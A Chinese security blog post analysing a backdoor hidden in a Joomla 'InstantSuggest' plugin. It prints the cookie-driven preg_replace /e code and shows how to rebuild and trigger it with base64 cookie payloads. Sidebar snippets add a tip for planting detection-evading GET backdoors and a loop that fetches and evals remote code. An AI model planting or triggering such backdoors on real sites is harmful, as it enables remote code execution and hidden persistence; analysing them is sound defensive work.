php -- cookie 后门

最新推荐文章于 2021-03-12 23:30:58 发布
最新推荐文章于 2021-03-12 23:30:58 发布
阅读量904 收藏
点赞数
分类专栏: PHP安全审计
本文分析了一段被植入后门的 Joomla 插件代码,该后门通过构造恶意函数利用 COOKIE 参数实现远程命令执行。文章展示了如何通过设置特定的 COOKIE 值触发后门并执行 phpinfo() 函数。

ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html

[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. GIF89a  
  2. <?php  
  3. /** 
  4.  * @package     Joomla.Plugin 
  5.  * @subpackage  system.instantsuggest 
  6.  * 
  7.  * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved. 
  8.  * @license     GNU General Public License version 2 or later 
  9.  */  
  10. /** 
  11.  * Instant Suggest Ajax 
  12.  * 
  13.  * @package     Joomla.Plugin 
  14.  * @subpackage  system.instantsuggest 
  15.  * @since       3.1 
  16.  */  
  17. class PlgSystemInstantSuggest  
  18. {  
  19.     public function __construct() {  
  20.         $filter = @$_COOKIE['p3'];  
  21.         if ($filter) {  
  22.             $option = $filter(@$_COOKIE['p2']);  
  23.             $auth = $filter(@$_COOKIE['p1']);  
  24.             $option("/123/e",$auth,123);  
  25.             die();  
  26.         }  
  27.     }  
  28. }  

利用上述部分代码建立页面bk-001.php,

[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. <?php  
  2. $filter = @$_COOKIE['p3'];  
  3. if ($filter) {  
  4.     $option = $filter(@$_COOKIE['p2']);  
  5.     $auth = $filter(@$_COOKIE['p1']);  
  6.     $option("/123/e",$auth,123);  
  7.     die();  
  8. }  
  9. ?>  

发送下列cookie值,

Cookie:  p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==

p3=base64_decode;

p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;

p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();


有写朋友可能喜欢使用Linux下的base64程序, 例如:  
echo preg_replace | base64 
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码(phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.


PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1765
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 982
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 253
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
PHP如何使用cookie后门,php -- cookie 后门
weixin_30237677的博客
03-11 112
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.htmlhttps://gist.github.com/PhilETaylor/8045002http://www.freebuf.com/articles/web/33275.htmlGIF89a/*** @package Joomla.Plugin* @s...
php怎么留cookie后门,ThinkPHP后门技巧
weixin_39679468的博客
03-12 253
原文连接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.htmlphp90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操做过程。htmlthinkphp的I函数,是其处理输入的函数,通常用法为I('get.id')——从$_GET数组中取出键为id的值,post、cook...
NFine.Framework框架去除cookie后门方法
小小德尔(C#)
12-21 7607
最近看到NFine开发团队开发的NFine.Framework开源框架,觉得挺好用的。 但是运行框架的时候发现加载首页的时候有在访问域名地址为 http://www.nfine.cn  的连接。这个是开源框架,自己拿来用,怎么能去访问莫名其妙的连接呢?在网上看到很多人也发现了这个问题。 我试着全项目查找这个域名,发现根本找不到,偶尔有一天研究框架的js的时候,发现 jquery.layout....
c00kiesD00r:后门cookie,通过cookie发送到Web服务器的命令
05-26
后门cookie,用于维护Web服务器上的访问的应用程序,它将带有User-Agent中设置的参数的GET请求发送到特定PHP页面,在其中读取接收到的cookie并将其作为参数传递给passthru()函数。PHP,因此该命令当然是在服务器...
基于PHP的白菜cms双端影视直播APP源码 全开源 无授权 无后门.zip
07-24
理解session、cookie和权限验证机制是关键。 8. **安全防护**:尽管源码声明无后门,但开发者仍需关注XSS、CSRF、SQL注入等常见Web安全问题,确保应用安全。 9. **性能优化**:对于高并发的视频直播平台,性能优化...
基于PHP的白菜cms双端影视直播APP全开源无授权无后门源码.zip
09-03
这可能通过session或cookie来实现,同时,用户权限管理可能涉及到角色分配,不同角色有不同的操作权限。 7. **API接口** 为了实现移动端应用与服务器的通信,白菜CMS可能提供了RESTful API接口。这些接口允许APP...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2959
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
HTTP cookies 讲解(HTTP cookies explained )
weixin_34187822的博客
07-28 644
为什么80%的码农都做不了架构师?>>> ...
NFine.Framework框架去除cookie后门
wizzly的专栏
03-22 1591
最近使用NFINE框架,由于涉及web,前后端思想与WINFORM相距甚远,有诸多之不解。 按照MVC框架思路套写了一些功能进去,但运行后由于服务器相对性能不好,运行有点慢,就开始找原因,运行时发现有http://www.nfine.cn,但搜索了很久出没有找到。苦恼了一段时间,放弃了。 今天无意中在https://blog.youkuaiyun.com/wuyuander/article/detail...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1213
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
PHP安全编程之cookie暴露导致session被劫持
爱代码也爱生活
08-10 1999
使用Cookie而产生的一个风险是用户的cookie会被攻击者所盗窃。如果会话标识保存在cookie中,cookie的暴露就是一个严重的风险,因为它能导致会话劫持。 PHP为你处理相关会话管理的复杂过程 最常见的cookie暴露原因是浏览器漏洞和跨站脚本攻击(见专题前几部分)。虽然现在并没有已知的该类浏览器漏洞,但是以往出现过几例,其中最有名的一例同时发生在IE浏览器的4.0,
使用Cookie实现自动登录技术
丶博弈
03-11 6336
1.页面勾选保存密码按钮 &lt;!-- 4.记住密码 --&gt; &lt;div class="form-group"&gt; &lt;div class="col-sm-offset-2 col-sm-10"&gt; &lt;div class="checkbox"&gt; &lt;label&gt;
查看工具是否存在后门
r0cky的博客
07-10 1254
查看工具是否存在后门 ​ 1、将工具打开(如:菜刀)连接上一个任务; ​ 2、打开进程抓包工具 WSExplorer 或 WSockExpert 设置对菜刀捕获数据; WSockExpert抓包教程可参考 https://www.cnblogs.com/mfrbuaa/p/4298594.html ​ 3、对url数据进行解包 将上面获取的数据复制到Encode中,如图5所示,选择“URI”类型,...
cookie免登陆案例及cookie保存session
zhang19903848257的博客
08-05 989
文章目录主要内容:思路及代码分析:小结问题: 主要内容: 假如我们在csdn上登陆账号,登陆之后,关闭浏览器。隔一段时间我们再次打开csdn时,我们会发现我们的账号已经被登陆了。那么这个是怎么实现的呢?接下来我们来实现一下。 思路及代码分析: 首先我们需要先登陆账号,登陆账号之后我们的用户信息用session存储起来。(用session存储的目的是为了之后你进行写blog或者收藏blog时,确定你是已经登陆了账号了)。 HttpSession session = request.getSessio
利用cookie实现用户自动登录的代码
洋洋
11-29 4250
cookie 是由服务器发送到浏览器的变量,cookie 通常是服务器嵌入到用户计算机中的小文本文件,每当计算机通过浏览器请求一个页面,就会发送这个 cookie,实例代码如下:<?php echo( "Cookie created? : " . setcookie("cookie_name", "cookie_data" ) ); ?> Cookie
探索c00kiesD00r: 利用Web后门cookie执行服务器命令
资源摘要信息:"c00kiesD00r是一个PHP后门程序,它通过Web服务器的cookie来接收并执行命令。后门cookie机制允许攻击者绕过正常的认证过程,通过在User-Agent中设置特定的参数并发送GET请求到一个特定的PHP页面来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值